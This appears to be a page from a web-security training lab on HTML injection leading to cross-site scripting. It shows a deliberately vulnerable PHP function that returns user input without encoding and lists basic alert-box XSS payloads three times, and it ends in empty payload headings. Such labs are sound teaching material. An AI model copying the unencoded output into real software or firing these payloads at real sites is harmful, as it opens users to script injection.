Lab 5: HTML Injection with XSS

HTML injection leading to Cross-Site Scripting

Difficulty: High

Lab Overview

This lab demonstrates the most dangerous form of HTML injection vulnerability where HTML injection can lead to Cross-Site Scripting (XSS). This is the ultimate goal of HTML injection attacks and represents the highest risk to applications.

Objective: Achieve Cross-Site Scripting through HTML injection vulnerabilities.

XSS Vulnerable Code 
// Vulnerable: Direct output leading to XSS
function process_html_input_xss($input) {
    if (empty($input)) {
        return "No input provided.";
    }
    
    // Vulnerable: Direct output without encoding
    return $input;
}
XSS HTML Injection
⚠️ XSS WARNING

This lab demonstrates XSS vulnerabilities. The following can execute JavaScript:

  • <script>alert('XSS')</script> - Basic XSS
  • <img src="x" onerror="alert('XSS')"> - Image XSS
  • <svg onload="alert('XSS')"> - SVG XSS
  • <iframe src="javascript:alert('XSS')"> - Iframe XSS
XSS Payloads

Try these XSS payloads:

  • <script>alert('XSS')</script> - Basic XSS
  • <img src="x" onerror="alert('XSS')"> - Image XSS
  • <svg onload="alert('XSS')"> - SVG XSS
  • <iframe src="javascript:alert('XSS')"> - Iframe XSS
Vulnerability Details
  • Type: HTML Injection with XSS
  • Severity: Critical
  • Method: POST
  • Issue: Direct HTML output leading to XSS
XSS Payloads
  • <script>alert('XSS')</script> - Basic XSS
  • <img src="x" onerror="alert('XSS')"> - Image XSS
  • <svg onload="alert('XSS')"> - SVG XSS
  • <iframe src="javascript:alert('XSS')"> - Iframe XSS
HTML Injection XSS Payloads

Use these payloads to achieve Cross-Site Scripting:

1. Basic XSS Payloads:
2. Image XSS Payloads:
3. SVG XSS Payloads:
4. Iframe XSS Payloads: